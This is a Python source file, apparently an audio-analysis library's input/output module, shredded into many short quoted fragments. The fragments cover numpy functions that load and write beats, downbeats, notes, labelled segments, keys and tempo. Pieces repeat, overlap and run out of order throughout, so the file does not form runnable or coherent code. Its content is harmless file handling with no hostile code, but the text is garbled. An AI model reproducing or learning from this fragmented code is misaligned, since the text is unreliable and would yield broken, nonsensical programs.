str or sequence of strs,", "try to load the data from file values = np.loadtxt(filename, ndmin=1) # split", "the beats to. fmt : str or sequence of strs, optional A single", "the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments", "@suppress_warnings def load_events(filename): \"\"\" Load a events from a text file, one floating", "header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the", "from the given file, one beat per line of format 'beat_time' ['beat_number']. Parameters", "and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is None: fmt", "from .audio import load_audio_file from .midi import load_midi, write_midi from ..utils import suppress_warnings,", "and 'label' the segment label. \"\"\" if fmt is None: fmt = ['%.3f',", "if not notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate format", "file as comment. mirex : bool, deprecated Report the lower tempo first (as", "format if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not", "file, one beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename :", "f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for e in events:", "= t2, t1, 1. - strength # format as a numpy array and", "fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a text file, one", "are downbeats return values[values[:, 1] == 1][:, 0] else: # 1st column is", "1). \"\"\" if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0]", "fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given", "0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower", "with the given mode and closes it if needed afterwards. Parameters ---------- filename", "additional columns are ignored, i.e. only the first column is returned. \"\"\" #", "or a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored.", "fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\" Load", "events : numpy array Events to be written to file. filename : str", "event's time, the rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f',", "file handle File to write the events to. fmt : str or sequence", "\"\"\" start, end, label = [], [], [] with open_file(filename) as f: for", "(column definition see SEGMENT_DTYPE). filename : str or file handle Output filename or", "tempo was detected if len(tempi) == 1: t1 = tempi[0][0] strength = 1.", "`split_value` are interpreted as tempi [bpm], `values` <= `split_value` are interpreted as strengths.", "position, and 'label' the segment label. \"\"\" if fmt is None: fmt =", "the beat time, the rest is ignored return values[:, 0] return values def", "file handle File to write the beats to. fmt : str or sequence", "- strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive') # no", "None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will be", "events: try: string = fmt % tuple(e.tolist()) except AttributeError: string = e except", "only one tempo was detected if len(tempi) == 1: t1 = tempi[0][0] strength", "['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter,", "from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename,", "time, the rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t',", "= ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format", "'wb') as f: # write header if header is not None: f.write(bytes(('# '", "or downbeats to be written to file. filename : str or file handle", "floating point numbers, and <label> is a string. Parameters ---------- filename : str", "read in the events, one per line events = np.loadtxt(filename, ndmin=2) # 1st", "if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb')", "File to write the beats to. fmt : str or sequence of strs,", "this is kind of hack-ish, find a better solution tempi = values[values >", "ndmin=2) # default values t1 = t2 = strength = np.nan # only", "array Events. Notes ----- Comments (lines starting with '#') and additional columns are", "three named columns: 'start' contains the start position (e.g. seconds), 'end' the end", "array with three named columns: 'start' contains the start position (e.g. seconds), 'end'", "---------- events : numpy array Events to be written to file. filename :", "built-in open() to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'):", "write the notes to. fmt : str or sequence of strs, optional A", ": float, optional Value to distinguish between tempi and strengths. `values` > `split_value`", "be written at the beginning of the file as comment. \"\"\" events =", "label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments", "column is the beat time, the rest is ignored return values[:, 0] return", "warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will be removed", "transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager", "None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for e in", "want a stable sorting algorithm # which keeps the order of the keys", "np.nan # only one tempo was detected if len(tempi) == 1: t1 =", "= (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len'", "is deprecated as of version 0.16 and will be ' 'removed in 0.18.", "beat time, the rest is ignored return values[:, 0] return values def write_beats(beats,", "filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename): \"\"\"", "will be ' 'removed in 0.18. Please truncate the returned array ' 'separately.')", "name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\"", "written to file. filename : str or file handle File to write the", "Value to distinguish between tempi and strengths. `values` > `split_value` are interpreted as", "normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths must have", "'%d', '%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format for `notes`')", "beats to a file. Parameters ---------- beats : numpy array Beats to be", "== 1: t1 = tempi[0][0] strength = 1. # consider only the two", "beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0] if fmt is", "to load the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename,", "events = np.array(events) # reformat fmt to be a single string if needed", "handle File to load the notes from. Returns ------- numpy array Notes. \"\"\"", "filename : str or file handle File to write the notes to. fmt", "length 'num_tempi' is returned. If strengths are given, a 2D array with tempi", "case `delimiter` is ignored. delimiter : str, optional String or character separating columns.", "given file. Parameters ---------- filename : str or file handle File to read", "str or file handle File to write the events to. fmt : str", "tempi (first column) and their relative strengths (second column) is returned. \"\"\" #", "will be written at the beginning of the file as comment. \"\"\" if", "\"\"\" Load the downbeats from the given file. Parameters ---------- filename : str", "string, e.g. '%.3f %d %.3f %d', in which case `delimiter` is ignored. delimiter", "optional Value to distinguish between tempi and strengths. `values` > `split_value` are interpreted", "['velocity']]. filename : str or file handle File to write the notes to.", "# check if we need to open the file if isinstance(filename, string_types): f", "header=None): \"\"\" Write key string to a file. Parameters ---------- key : str", "order of the keys in case of duplicate keys # but we need", "beats to. fmt : str or sequence of strs, optional A single format", "'%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter : str, optional", "'%.3f', '%d']), or a multi-format string, e.g. '%.3f %d %.3f %d', in which", "'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle File to write", "= end segments['label'] = label return segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None):", "dominant tempi and the relative strength to a file. Parameters ---------- tempi :", "Load the downbeats from the given file. Parameters ---------- filename : str or", "2d array tempi = np.array(tempi, ndmin=2) # default values t1 = t2 =", "case of duplicate keys # but we need to apply this '(-strengths)' trick", "of the file as comment. Returns ------- numpy array Notes. \"\"\" # set", "write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from file,", "at the beginning of the file as comment. Returns ------- numpy array Notes.", "castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite", "header=None, mirex=None): \"\"\" Write the most dominant tempi and the relative strength to", "------ Open file (handle). \"\"\" # check if we need to open the", "overwrite the built-in open() to transparently apply some magic file handling @contextlib.contextmanager def", "strs, optional A single format (e.g. '%.3f'), a sequence of formats, or a", "beginning of the file as comment. Notes ----- If `beats` contains both time", "is opened. Yields ------ Open file (handle). \"\"\" # check if we need", "\"\"\" Load labelled segments from file, one segment per line. Each segment is", "np.any(strengths < 0): raise AssertionError('strengths must be positive') # no strength is given,", "bool, deprecated Normalize the strengths to sum 1. max_len : int, deprecated Return", "File to load the beats from. downbeats : bool, optional Load only downbeats", "and their relative strength if max_len is not None: import warnings warnings.warn('`max_len` is", "tempi. If no strength is parsed, a 1-dimensional array of length 'num_tempi' is", "segments. \"\"\" start, end, label = [], [], [] with open_file(filename) as f:", "------- numpy array Beats. \"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1:", "(list, tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as f:", "one beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename : str", ": str or file handle Output file. delimiter : str, optional String or", "beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is None: fmt =", "write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters", "[bpm], `values` <= `split_value` are interpreted as strengths. sort : bool, deprecated Sort", "Load the notes from the given file, one note per line of format", "ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a", "as f: for line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e))", "strengths are given (one less than tempi) if len(tempi) - len(strengths) == 1:", "be given first if mirex is not None: import warnings warnings.warn('`mirex` argument is", "read key information from. Returns ------- str Key. \"\"\" with open_file(filename) as f:", "' 'and will be removed in version 0.17. Please sort the ' 'tempi", "file handle File to read key information from. Returns ------- str Key. \"\"\"", "order the tempi according to their strengths if sort: import warnings warnings.warn('`sort` is", "sorting algorithm # which keeps the order of the keys in case of", "beats, they are filtered to contain only the downbeats (i.e. only the times", "for `notes`') # truncate format to the number of colums given fmt =", "str or file handle Output filename or handle. fmt : str or sequence", "tempi and strengths elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength", "= np.loadtxt(filename, ndmin=1) # split the filename according to their filename into tempi", "------- numpy array Notes. \"\"\" # set default format if fmt is None:", "open() to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\"", "else: # 1st column is the beat time, the rest is ignored return", "float(len(tempi)) # normalize the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths`", "file handle File to load the notes from. Returns ------- numpy array Notes.", "tempi[sort_idx] strengths = strengths[sort_idx] # return at most 'max_len' tempi and their relative", "of the keys in case of duplicate keys # but we need to", "mode) else: f = filename fid = None # yield an open file", ": numpy array Beats to be written to file. filename : str or", "Parameters ---------- filename : str or file handle File to read the labelled", "tempi and strengths must have same length if len(tempi) != len(strengths): raise AssertionError('tempi", "# 'label' needs to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end',", "MIREX). Returns ------- tempo_1 : float The most dominant tempo. tempo_2 : float", "%.3f %s'), in which case `delimiter` is ignored. delimiter : str, optional String", "< 0): raise AssertionError('strengths must be positive') # no strength is given, assume", "or file handle File to write the notes to. fmt : str or", "to a file, one event per line. Parameters ---------- events : numpy array", "numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None):", "'%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from", "values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the", "delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: # write header if", "floating point number per line. Parameters ---------- filename : str or file handle", "of version 0.16 and ' 'will be removed in 0.18. Please normalize strengths", "beginning of the file as comment. Returns ------- key : str Key name.", "deprecated as of version 0.16 and will be ' 'removed in 0.18. Please", "or file handle File to load the tempo from. split_value : float, optional", "apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which", "a file. Parameters ---------- key : str Key name. filename : str or", ": str, optional String that will be written at the beginning of the", "load the beats from. downbeats : bool, optional Load only downbeats instead of", "string. Parameters ---------- filename : str or file handle File to read the", "structured array Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename :", "string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored. delimiter :", "# write header if header is not None: f.write(bytes(('# ' + header +", "== 2: beats = beats[beats[:, 1] == 1][:, 0] if fmt is None:", "Load a events from a text file, one floating point number per line.", "def load_downbeats(filename): \"\"\" Load the downbeats from the given file. Parameters ---------- filename", "= delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename):", "notes from the given file, one note per line of format 'onset_time' 'note_number'", "fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file. Parameters ---------- beats", "strengths /= float(strength_sum) # tempi and strengths must have same length if len(tempi)", "(first column) and their relative strengths (second column) is returned. \"\"\" # try", "filename : str or file handle File to read the labelled segments from.", "warnings.warn('`norm_strengths` is deprecated as of version 0.16 and ' 'will be removed in", "Notes. \"\"\" # set default format if fmt is None: fmt = ['%.3f',", "<start> and <end> are floating point numbers, and <label> is a string. Parameters", "make the strengths behave properly strength_sum = np.sum(strengths) # relative strengths are given", "at most 'max_len' tempi and their relative strength if max_len is not None:", "dominant tempo. tempo_2 : float The second most dominant tempo. strength : float", "to transparently apply some magic file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context", "File to write the notes to. fmt : str or sequence of strs,", "(second column). filename : str or file handle Output file. delimiter : str,", "returned. If strengths are given, a 2D array with tempi (first column) and", "the beats to a file. Parameters ---------- beats : numpy array Beats to", "or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f',", "a single string if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) #", "or sequence of strs, optional A single format (e.g. '%.3f'), a sequence of", "'%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def", "are interpreted as strengths. sort : bool, deprecated Sort the tempi by their", "bool, optional Load only downbeats instead of beats. Returns ------- numpy array Beats.", ": str or file handle File (handle) to open. mode: {'r', 'w'} Specifies", "or file handle Output filename or handle. fmt : str or sequence of", "\"\"\" # set default format if fmt is None: fmt = ['%.3f', '%d',", "tempi[0][0] strength = 1. # consider only the two strongest tempi and strengths", "# format as a numpy array and write to output out = np.array([t1,", "single format (e.g. '%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a", "split_value] # make the strengths behave properly strength_sum = np.sum(strengths) # relative strengths", "of hack-ish, find a better solution tempi = values[values > split_value] strengths =", "the beginning of the file as comment. Returns ------- numpy array Notes. \"\"\"", "= values[values > split_value] strengths = values[values <= split_value] # make the strengths", "handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an open file", "load the data from file values = np.loadtxt(filename, ndmin=1) # split the filename", "one note per line of format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename:", "seconds), 'end' the end position, and 'label' the segment label. \"\"\" if fmt", "str Key. \"\"\" with open_file(filename) as f: return f.read().strip() def write_key(key, filename, header=None):", "fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file, one event per", "relative strengths are given (one less than tempi) if len(tempi) - len(strengths) ==", "the beginning of the file as comment. \"\"\" events = np.array(events) # reformat", "/ sum(tempi[:2, 1]) # for MIREX, the lower tempo must be given first", "(e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter : str, optional", "are given (one less than tempi) if len(tempi) - len(strengths) == 1: strengths", "`max_len` tempi. Returns ------- tempi : numpy array, shape (num_tempi[, 2]) Array with", "needed afterwards. Parameters ---------- filename : str or file handle File (handle) to", "str or sequence of strs, optional A single format (e.g. '%.3f'), a sequence", "be removed in version 0.17. Please sort the ' 'tempi manually') if t1", "in events: try: string = fmt % tuple(e.tolist()) except AttributeError: string = e", "or a multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter` is", "downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a", "'label' the segment label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f',", "one per line events = np.loadtxt(filename, ndmin=2) # 1st column is the event's", "values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows with", "key from the given file. Parameters ---------- filename : str or file handle", "0.16 and will be ' 'removed in 0.18. Please sort the returned array", "to load the beats from. downbeats : bool, optional Load only downbeats instead", "Write the most dominant tempi and the relative strength to a file. Parameters", "elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def", "for e in events: try: string = fmt % tuple(e.tolist()) except AttributeError: string", "per line. Each segment is of form <start> <end> <label>, where <start> and", "fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: # write", "with uniformly distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi =", "= fmt % tuple(e.tolist()) except AttributeError: string = e except TypeError: string =", "from the given file. Parameters ---------- filename : str or file handle File", "numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None):", "strength to a file. Parameters ---------- tempi : numpy array Array with the", "load the events from. Returns ------- numpy array Events. Notes ----- Comments (lines", "row (column definition see SEGMENT_DTYPE). filename : str or file handle Output filename", "---------- tempi : numpy array Array with the detected tempi (first column) and", "+ '\\n').encode(ENCODING))) # write events for e in events: try: string = fmt", "None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim == 2: raise", "load_events(filename): \"\"\" Load a events from a text file, one floating point number", "= tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the lower tempo must", "filename : str or file handle Output filename or handle. fmt : str", "only the downbeats (i.e. only the times of those beats with a beat", "(as required by MIREX). Returns ------- tempo_1 : float The most dominant tempo.", "return at most 'max_len' tempi and their relative strength if max_len is not", "set default format if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d']", "\"\"\" Load a events from a text file, one floating point number per", "load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the", "return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes", "duplicate keys # but we need to apply this '(-strengths)' trick because we", "write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters", "def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi and", "split_value : float, optional Value to distinguish between tempi and strengths. `values` >", "from __future__ import absolute_import, division, print_function import io as _io import contextlib import", "Structured array with columns 'start', 'end', and 'label', containing the beginning, end, and", "be written at the beginning of the file as comment. Returns ------- numpy", "isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f = filename fid", "fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from", "in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and", "numpy array, shape (num_tempi[, 2]) Array with tempi. If no strength is parsed,", "the downbeats to a file. Parameters ---------- beats : numpy array Beats or", "write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords = write_segments def load_key(filename):", "np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive')", "\"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import io as", "== 2: fmt = ['%.3f', '%d'] elif fmt is None: fmt = '%.3f'", "values[values <= split_value] # make the strengths behave properly strength_sum = np.sum(strengths) #", "strength is given, assume an evenly distributed one if strength_sum == 0: strengths", "labelled segments # 'label' needs to be castable to str SEGMENT_DTYPE = [('start',", "# order the tempi according to their strengths if sort: import warnings warnings.warn('`sort`", "times of those beats with a beat number of 1). \"\"\" if beats.ndim", "with a \"1\" in the 2nd column are downbeats return values[values[:, 1] ==", "t1 > t2: t1, t2, strength = t2, t1, 1. - strength #", "array Labelled segments Notes ----- Labelled segments are represented as numpy structured array", "columns. header : str, optional String that will be written at the beginning", "\"\"\" if fmt is None and beats.ndim == 2: fmt = ['%.3f', '%d']", "'#') and additional columns are ignored, i.e. only the first column is returned.", "> 1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2,", "2: raise ValueError('unknown format for `notes`') # truncate format to the number of", "t1 = t2 = strength = np.nan # only one tempo was detected", "np from .audio import load_audio_file from .midi import load_midi, write_midi from ..utils import", "lower tempo must be given first if mirex is not None: import warnings", "to be a single string if needed if isinstance(fmt, (list, tuple)): fmt =", "returned array ' 'separately.') # Note: use 'mergesort', because we want a stable", ": str or sequence of strs, optional A single format (e.g. '%.3f'), a", "their relative strengths (second column) is returned. \"\"\" # try to load the", "dtype for numpy structured arrays that contain labelled segments # 'label' needs to", "the beginning of the file as comment. Returns ------- numpy structured array Labelled", ": str or file handle File to write the beats to. fmt :", "sort : bool, deprecated Sort the tempi by their strength. norm_strengths : bool,", "elif len(tempi) > 1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1]", "0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths is", "2nd column are downbeats return values[values[:, 1] == 1][:, 0] else: # 1st", "behave properly strength_sum = np.sum(strengths) # relative strengths are given (one less than", ": bool, optional Load only downbeats instead of beats. Returns ------- numpy array", "the file if isinstance(filename, string_types): f = fid = _io.open(filename, mode) else: f", "file. Parameters ---------- beats : numpy array Beats or downbeats to be written", "= tempi[0][0] strength = 1. # consider only the two strongest tempi and", "handle Output file. header : str, optional String that will be written at", "Parameters ---------- filename: str or file handle File to load the notes from.", "2D array with tempi (first column) and their relative strengths (second column) is", "and strengths must have same length') # order the tempi according to their", "the relative strength to a file. Parameters ---------- tempi : numpy array Array", "written at the beginning of the file as comment. Notes ----- If `beats`", "----- Labelled segments are represented as numpy structured array with three named columns:", "Events to be written to file. filename : str or file handle File", "their relative strength if max_len is not None: import warnings warnings.warn('`max_len` is deprecated", "is given, assume an evenly distributed one if strength_sum == 0: strengths =", "str or sequence of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f',", "the events to a file, one event per line. Parameters ---------- events :", "only the two strongest tempi and strengths elif len(tempi) > 1: t1, t2", "events from. Returns ------- numpy array Events. Notes ----- Comments (lines starting with", "split the filename according to their filename into tempi and strengths # TODO:", "their strengths (second column). filename : str or file handle Output file. delimiter", "open_file(filename, 'wb') as f: # write header if header is not None: f.write(bytes(('#", "according to their strengths if sort: import warnings warnings.warn('`sort` is deprecated as of", "np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the rest is ignored", "in the events, one per line events = np.loadtxt(filename, ndmin=2) # 1st column", "' 'separately.') # Note: use 'mergesort', because we want a stable sorting algorithm", "header if header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) #", "time and number of the beats, they are filtered to contain only the", "the two strongest tempi and strengths elif len(tempi) > 1: t1, t2 =", "file handle File to load the downbeats from. Returns ------- numpy array Downbeats.", "notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate format to the", ": str or file handle File to read the labelled segments from. Returns", "= strength = np.nan # only one tempo was detected if len(tempi) ==", "a 1-dimensional array of length 'num_tempi' is returned. If strengths are given, a", "write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f',", "the given mode and closes it if needed afterwards. Parameters ---------- filename :", "events = np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the rest", "= fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets =", "Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename, fmt=None,", "are given, a 2D array with tempi (first column) and their relative strengths", "manually') if t1 > t2: t1, t2, strength = t2, t1, 1. -", "required by MIREX). Returns ------- tempo_1 : float The most dominant tempo. tempo_2", "------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename,", "from .midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8'", "len(tempi) > 1: t1, t2 = tempi[:2, 0] strength = tempi[0, 1] /", "load the tempo from. split_value : float, optional Value to distinguish between tempi", "key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1.,", "handle File to read the labelled segments from. Returns ------- segments : numpy", ": str or file handle File to load the events from. Returns -------", "from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename, ndmin=2) def write_notes(notes, filename,", "ignored, i.e. only the first column is returned. \"\"\" # read in the", "= np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be", "------- tempi : numpy array, shape (num_tempi[, 2]) Array with tempi. If no", "' 'removed in 0.18. Please truncate the returned array ' 'separately.') return np.vstack((tempi[:max_len],", "1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths", "Output file. header : str, optional String that will be written at the", "structured array Labelled segments Notes ----- Labelled segments are represented as numpy structured", "format 'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle File", "str or file handle File to load the downbeats from. Returns ------- numpy", "line of format 'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle", "\"\"\" Write the notes to a file. Parameters ---------- notes : numpy array,", "file handle File to load the tempo from. split_value : float, optional Value", "of format 'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle File", "not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events for e", "fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file. Parameters ---------- segments", "= 1. # consider only the two strongest tempi and strengths elif len(tempi)", "the beginning of the file as comment. \"\"\" if fmt is None and", ": str or file handle Output file. header : str, optional String that", "with open_file(filename) as f: for line in f: s, e, l = line.split()", "# truncate format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) #", "removed in version 0.17. Please sort the ' 'tempi manually') if t1 >", "= np.sum(strengths) # relative strengths are given (one less than tempi) if len(tempi)", "to open the file if isinstance(filename, string_types): f = fid = _io.open(filename, mode)", "import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype", "tempo first (as required by MIREX). Returns ------- tempo_1 : float The most", "numpy structured array Labelled segments Notes ----- Labelled segments are represented as numpy", "according to their filename into tempi and strengths # TODO: this is kind", "# reformat fmt to be a single string if needed if isinstance(fmt, (list,", "as f: # write header if header is not None: f.write(bytes(('# ' +", "header=None): \"\"\" Write the notes to a file. Parameters ---------- notes : numpy", "a file. Parameters ---------- segments : numpy structured array Labelled segments, one per", "i.e. only the first column is returned. \"\"\" # read in the events,", "split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file. Tempo", "load_notes(filename): \"\"\" Load the notes from the given file, one note per line", "# yield an open file handle yield f # close the file if", "bool, deprecated Sort the tempi by their strength. norm_strengths : bool, deprecated Normalize", "= '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load the", "write_segments def load_key(filename): \"\"\" Load the key from the given file. Parameters ----------", "the given tempi a 2d array tempi = np.array(tempi, ndmin=2) # default values", "write output with open_file(filename, 'wb') as f: # write header if header is", "Array with the detected tempi (first column) and their strengths (second column). filename", "be ' 'removed in 0.18. Please truncate the returned array ' 'separately.') return", "handle File to write the events to. fmt : str or sequence of", "beats = beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt =", "given (one less than tempi) if len(tempi) - len(strengths) == 1: strengths =", "if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version", "2: beats = beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt", "the downbeats from. Returns ------- numpy array Downbeats. \"\"\" return load_beats(filename, downbeats=True) def", "at the beginning of the file as comment. \"\"\" if fmt is None", "delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters ---------- notes :", "---------- segments : numpy structured array Labelled segments, one per row (column definition", "{'r', 'w'} Specifies the mode in which the file is opened. Yields ------", "'and will be removed in version 0.17. Please sort the ' 'tempi manually')", "the events to. fmt : str or sequence of strs, optional A single", "'separately.') # Note: use 'mergesort', because we want a stable sorting algorithm #", "beats from. downbeats : bool, optional Load only downbeats instead of beats. Returns", "needed if fid: fid.close() @suppress_warnings def load_events(filename): \"\"\" Load a events from a", "f: return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to a", "AttributeError: string = e except TypeError: string = fmt % e f.write(bytes((string +", "file, one segment per line. Each segment is of form <start> <end> <label>,", "Open file (handle). \"\"\" # check if we need to open the file", "> t2: t1, t2, strength = t2, t1, 1. - strength # format", "Report the lower tempo first (as required by MIREX). Returns ------- tempo_1 :", "> `split_value` are interpreted as tempi [bpm], `values` <= `split_value` are interpreted as", "'start' contains the start position (e.g. seconds), 'end' the end position, and 'label'", "mode='r'): \"\"\" Context manager which yields an open file or handle with the", "1] == 1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats, filename,", "as numpy structured array with three named columns: 'start' contains the start position", "def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats to a file.", "to read the labelled segments from. Returns ------- segments : numpy structured array", "which keeps the order of the keys in case of duplicate keys #", "(second column) is returned. \"\"\" # try to load the data from file", "if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings", "apply this '(-strengths)' trick because we want # tempi with uniformly distributed strengths", "only the first column is returned. \"\"\" # read in the events, one", "separating columns. header : str, optional String that will be written at the", "events to a file, one event per line. Parameters ---------- events : numpy", "delimiter='\\t', header=None): \"\"\" Write the beats to a file. Parameters ---------- beats :", "len(tempi) - len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths", "Returns ------- tempo_1 : float The most dominant tempo. tempo_2 : float The", "tempi by their strength. norm_strengths : bool, deprecated Normalize the strengths to sum", "`values` <= `split_value` are interpreted as strengths. sort : bool, deprecated Sort the", "because we want a stable sorting algorithm # which keeps the order of", "for MIREX, the 